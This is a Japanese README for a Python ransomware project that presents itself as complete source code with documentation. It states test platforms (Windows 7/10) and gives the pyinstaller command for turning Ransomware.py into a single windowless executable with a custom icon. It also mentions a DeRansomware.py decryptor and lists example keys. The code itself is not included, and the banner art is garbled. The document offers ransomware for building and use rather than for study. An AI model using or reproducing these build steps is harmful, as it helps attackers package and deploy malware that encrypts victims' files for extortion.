
完全なPythonランサムウェアソースコードと完全なドキュメント。
完全なPython RansomeWareのソースコードと完全なデキュメンテーション。
____ ____ _ _ ____ ____ _ _ _ _ _ ____ ____ ____ ___ _ _ |__/ |__| |\ | [__ | | |\/| | | | |__| |__/ |___ |__] \_/ | \ | | | \| ___] |__| | | |_|_| | | | \ |___ .| |
概要: これはPythonで書かれた古典的なRansomeWareの例です。
テスト環境: Windows 10 / Windows7
サポート: +Windows7
公開日: 10/31/2019
最終更新: 11/3/2019
ランサムウェアとは何かについて調べる
ランサムウェアとは何か? -> ここをクリック <-
.pyをexeに変換するにはpyinstallerを使用できます。
pyinstallerのインストール: https://www.pyinstaller.org
.pyファイルをexeに変換: pyinstaller --onefile -w --icon YourIcon.ico Ransomware.py
ファイルをexeに変換する前に実行: pip install --user --requirement requirements.txt
DeRansomware.pyを実行 行29から :

あなたのキー (例):
Key = b"\xbd\xb6\x80'4z\x9c\xb53{\xe3\xd7\xf4\xc2\\x08\xbd\xbb\xdb\xd6\xb2.\xfa\xe1o\x1f\xcd\x80AM\xd5>"
Key = b'T\xb5\xc4\x14\xe4\xa7\x18\x0b8T\xdb\xec\xf0.v>t\xce\x91w5y1\xce\xa3\x1a;J<SKD'
(11/3/2019) 変更ログ: